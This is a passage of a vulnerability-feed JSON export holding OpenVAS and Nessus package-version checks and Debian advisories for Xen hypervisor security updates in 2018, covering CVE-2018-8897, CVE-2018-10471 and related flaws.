(bsc#1074562\n XSA-254)\n\n - qemu-system-i386 cannot handle more than 4 HW NICs (bsc#1090296)\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1487-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00002.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report 
+= res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.9.2_06~22.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-11T16:46:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "The remote host is missing an update for the ", "modified": "2020-06-09T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310851742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851742", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851742\");\n script_version(\"2020-06-09T14:44:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 14:44:58 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:51:06 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7540\", \"CVE-2018-7541\",\n \"CVE-2018-7542\", \"CVE-2018-8897\", \"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2018:1274-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. 
They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptible L3/L4 pagetable freeing\n (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n Patch Instructions:\n\n To 
install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-454=1\");\n\n script_tag(name:\"affected\", value:\"xen on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1274-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.9.2_04~19.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2018-12893", "CVE-2018-3620", "CVE-2018-3665", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-30T00:00:00", "id": "OPENVAS:1361412562310875010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875010", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-683dfde81a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_683dfde81a_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-683dfde81a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License 
version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875010\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-30 07:24:42 +0200 (Thu, 30 Aug 2018)\");\n script_cve_id(\"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-12891\", \"CVE-2018-12893\",\n \"CVE-2018-12892\", \"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\",\n \"CVE-2018-10982\", \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\",\n \"CVE-2018-15469\", \"CVE-2018-15468\", \"CVE-2018-15470\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-683dfde81a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-683dfde81a\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GOBWAAGQGXLQJKTEI5JYA4HQNK4EI4XY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~6.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2018-12893", "CVE-2018-18883", "CVE-2018-3620", "CVE-2018-3665", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-11-12T00:00:00", "id": "OPENVAS:1361412562310875255", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875255", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-73dd8de892", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_73dd8de892_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-73dd8de892\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, 
http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875255\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-15469\", \"CVE-2018-15468\", \"CVE-2018-15470\", \"CVE-2018-12891\", \"CVE-2018-12893\", \"CVE-2018-12892\", \"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\", \"CVE-2018-18883\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:20:33 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for xen FEDORA-2018-73dd8de892\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-73dd8de892\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N4MA4UUBF3E5HSEL3AI2HU7ITV2Z4YKI\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the FEDORA-2018-73dd8de892 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"xen on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.2~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-09-12T01:03:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4201-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMay 15, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2018-8897 CVE-2018-10471 CVE-2018-10472 CVE-2018-10981 \n CVE-2018-10982\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\n\n Andy Lutomirski and Nick Peterson 
discovered that incorrect handling\n of debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\n\n An error was discovered in the mitigations against Meltdown which\n could result in denial of service.\n\nCVE-2018-10472\n\n Anthony Perard discovered that incorrect parsing of CDROM images\n can result in information disclosure.\n\nCVE-2018-10981\n\n Jan Beulich discovered that malformed device models could result\n in denial of service.\n\nCVE-2018-10982\n\n Roger Pau Monne discovered that incorrect handling of high precision\n event timers could result in denial of service and potentially\n privilege escalation.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-05-15T20:04:28", "published": "2018-05-15T20:04:28", "id": "DEBIAN:DSA-4201-1:7E613", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00128.html", "title": "[SECURITY] [DSA 4201-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Package : xen\nVersion : 4.1.6.lts1-14\nCVE ID : CVE-2018-8897 CVE-2018-10981 CVE-2018-10982\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\n\nFor Debian 7 \"Wheezy\", these problems
have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-05-25T11:26:24", "published": "2018-05-25T11:26:24", "id": "DEBIAN:DLA-1383-1:AD0A7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201805/msg00015.html", "title": "[SECURITY] [DLA 1383-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:59:58", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10472", "CVE-2018-10981", "CVE-2017-15592", "CVE-2017-17045", "CVE-2017-17044", "CVE-2017-15593", "CVE-2017-15594", "CVE-2017-15595"], "description": "Package : xen\nVersion : 4.4.4lts3-0+deb8u1\nCVE ID : CVE-2017-15592 CVE-2017-15593 CVE-2017-15594 CVE-2017-15595 \n CVE-2017-17044 CVE-2017-17045 CVE-2018-10472 CVE-2018-10981\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\n\nFor Debian 8 \"Jessie\", these problems have been fixed in version\n4.4.4lts3-0+deb8u1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 8, "modified": "2018-10-30T07:46:55", "published": "2018-10-30T07:46:55", "id": "DEBIAN:DLA-1559-1:6EBBD", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201810/msg00021.html", "title": "[SECURITY] [DLA 1559-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T01:52:33", "description": "Multiple vulnerabilities have been
discovered in the Xen hypervisor :\n\n - CVE-2018-8897\n Andy Lutomirski and Nick Peterson discovered that\n incorrect handling of debug exceptions could result in\n privilege escalation.\n\n - CVE-2018-10471\n An error was discovered in the mitigations against\n Meltdown which could result in denial of service.\n\n - CVE-2018-10472\n Anthony Perard discovered that incorrect parsing of\n CDROM images can result in information disclosure.\n\n - CVE-2018-10981\n Jan Beulich discovered that malformed device models\n could result in denial of service.\n\n - CVE-2018-10982\n Roger Pau Monne discovered that incorrect handling of\n high precision event timers could result in denial of\n service and potentially privilege escalation.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-16T00:00:00", "title": "Debian DSA-4201-1 : xen - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xen", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4201.NASL", "href": "https://www.tenable.com/plugins/nessus/109816", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4201. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109816);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"DSA\", value:\"4201\");\n\n script_name(english:\"Debian DSA-4201-1 : xen - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the Xen hypervisor :\n\n - CVE-2018-8897\n Andy Lutomirski and Nick Peterson discovered that\n incorrect handling of debug exceptions could result in\n privilege escalation.\n\n - CVE-2018-10471\n An error was discovered in the mitigations against\n Meltdown which could result in denial of service.\n\n - CVE-2018-10472\n Anthony Perard discovered that incorrect parsing of\n CDROM images can result in information disclosure.\n\n - CVE-2018-10981\n Jan Beulich discovered that malformed device models\n could result in denial of service.\n\n - CVE-2018-10982\n Roger Pau Monne discovered that incorrect handling of\n high precision event timers could result in denial of\n service and potentially privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-8897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2018-10981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4201\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libxen-4.8\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxen-dev\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxenstore3.0\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) 